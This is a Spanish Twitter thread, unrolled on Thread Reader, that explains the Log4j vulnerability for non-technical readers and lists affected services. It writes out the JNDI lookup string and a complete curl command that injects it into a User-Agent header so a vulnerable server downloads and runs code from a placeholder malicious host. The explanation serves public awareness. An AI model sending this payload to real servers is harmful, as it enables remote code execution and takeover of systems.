¿Cuál es el problema de seguridad descubierto en #log4j del que todos los informáticos estamos hablando?

Una explicación lo más simple que pueda para no informáticos. A ver si se entiende. 👇
1) #log4j es un componente de software incluido en muchísimos productos, que se encarga de escribir los "logs" (registros que deja toda aplicación en los servidores, donde queda constancia de cada cosa que se hizo).
2) Cada vez que interactuamos (desde un navegador o una app del celular) con una aplicación web, enviamos "requests" (pedidos) para acceder a determinados recursos o ejecutar acciones. Esos requests contienen distintos "campos" con información que es enviada al servidor.
3) El problema que se descubrió en #log4j es que si en un request se incluye algún campo con el valor "${jdni:ldap://servidormalicioso/codigomalicioso}", el servidor que corre esta biblioteca termina descargando "codigomalicioso" de "servidormalicioso" y ejectuándolo.
4) Esto significa que con solo mandar un request con un campo de este tipo, cualquiera podría lograr ejecutar el código que quisiera en el servidor afectado. Es el tipo de errores que puede ser explotado hasta por alguien sin demasiados conocimientos.
5) ¿Algunos afectados por este problema? Casi nada: iCloud de Apple, Twitter, Minecraft y muchos más. De hecho, se sabe que están afectados varios productos de VMWare, una de las plataformas de virtualización de servidores más usadas.
6) En la inmensa mayoría de los casos ya hay una solución disponible (o al menos una forma de mitigar el problema). Pero aplicarlas muchas veces lleva tiempo, y también hay que revisar cada aplicación hecha a medida usando #log4j.
7) A esta altura todavía no se sabe exactamente cuál es el impacto de #log4j. Lo que sí se sabe es que desde hace días hay varios grupos escaneando servidores en Internet tratando de detectar la vulnerabilidad. Y se espera que pronto aparezca algún "gusano" o virus por el estilo.
8) Otro ejemplo de una vulnerabilidad grave, "escondida" durante años en un componente poco importante al que nadie prestaba demasiada atención. Sí, así está construido el software que usamos.

Este chiste es viejo: Image
9) ¿Un ejemplo de cómo se haría? Con el comando:

curl -H "User-Agent: \${jndi:ldap://servidormalicioso/codigomalicioso}" https://servidorvulnerable/

El atacante puede lograr que el "servidorvulnerable" descargue su "codigomalicioso" desde su "servidormalicioso" y lo ejecute.

• • •

Missing some Tweet in this thread? You can try to force a refresh
 

Keep Current with Javier Smaldone

Javier Smaldone Profile picture

Stay in touch and get notified when new unrolls are available from this author!

Read all threads

This Thread may be Removed Anytime!

PDF

Twitter may remove this content at anytime! Save it as PDF for later use!

Try unrolling a thread yourself!

how to unroll video
  1. Follow @ThreadReaderApp to mention us!

  2. From a Twitter thread mention us with a keyword "unroll"
@threadreaderapp unroll

Practice here first or read more on our help page!

More from @mis2centavos

15 Dec
"Me cancelaron" como argumento de venta. (1) ImageImageImageImage
"Me cancelaron" como argumento de venta. (2) ImageImageImageImage
"Me cancelaron" como argumento de venta. (3) ImageImageImageImage
Read 17 tweets
2 Dec
Voy a contarles una historia tragicómica titulada "El exhorto del juez Rodríguez", que transcurrió mayormente en los Tribunales Federales de Comodoro Py. 👇
Cierto día, en el marco de la investigación por la filtración de datos de la @PFAOficial (#LaGorraLeaks 2.0), el fiscal Horacio Azzolin le avisó al juez Luis Rodríguez que se había olvidado de pedir ciertos datos importantes, y para eso tenía que mandar un exhorto a los EE. UU.
Entonces el juez federal Luis Rodríguez el 20 de abril de 2021 dijo: "bueno, escribamos el exhorto a la Justicia de los EE. UU.", y puso a su gente a trabajar. Y después, se lo mandó a una traductora oficial, ya que a duras penas escriben en español... imaginen en inglés.
Read 24 tweets
1 Dec
ÚLTIMO ESCRITO enviado al juez Luis Rodríguez, luego de que sobreseyera a todos los investigados y archivara la causa por la filtración de datos de la @PFAOficial, #LaGorraLeaks 2.0.

Con canción, cita de libro y dibujito. A ver si al final entiende algo.

archive.org/download/linea…
Póngale música, V.S.
Read 4 tweets
29 Nov
La lista de atropellos que sufrimos mi familia y yo por parte de la @PFAOficial con el aval del juez federal LUIS RODRÍGUEZ:

1) Mi pareja y yo fuimos seguidos por la calle y fotografiados, nunca sabré bien durante cuánto tiempo. ImageImage
2) Se instalaron cámaras de vigilancia frente al domicilio de mis hijos en Río Cuarto. Y en la Ciudad de Buenos Aires, se puso una cámara frente al domicilio de alguien con quien me confundieron. ImageImageImageImage
3) Se pidieron los registros de tarjetas SUBE míos y de mi pareja durante 8 meses y medio. Image
Read 10 tweets
23 Nov
La banda del ransomware #Everest pone a la venta acceso a sistemas del Gobierno argentino por US$200.000.
En los últimos días, #Everest ha atacado a varios organismos gubernamentales.
Así venden acceso a sistemas del Gobierno de los EE. UU., de la Policía de Brasil y del Ministerio de Economía de Perú.
Read 6 tweets
4 Nov
¡¡¡AL FIN!!!
Después de más de 2 años pude acceder al diagrama con el que la @PFAOficial convención al juez federal Luis Rodríguez de allanarme, detenerme y quitarme mis herramientas de trabajo.
Vamos por partes:
1) Entre las IP de los supuestos atacantes y yo hay en común... hosting en Digital Ocean, Ubuntu como sistema operativo, Nginx como webserver y GoDaddy como registradora. 😳
2) Además tengo conocimientos de administración de sistemas, Python y Java... 🤔
Read 13 tweets

Did Thread Reader help you today?

Support us! We are indie developers!


This site is made by just two indie developers on a laptop doing marketing, support and development! Read more about the story.

Become a Premium Member ($3/month or $30/year) and get exclusive features!

Become Premium

Too expensive? Make a small donation by buying us coffee ($5) or help with server cost ($10)

Donate via Paypal

Or Donate anonymously using crypto!

Ethereum

0xfe58350B80634f60Fa6Dc149a72b4DFbc17D341E copy

Bitcoin

3ATGMxNzCUFzxpMCHL5sWSt4DVtS8UqXpi copy

Thank you for your support!

Follow Us on Twitter!

:(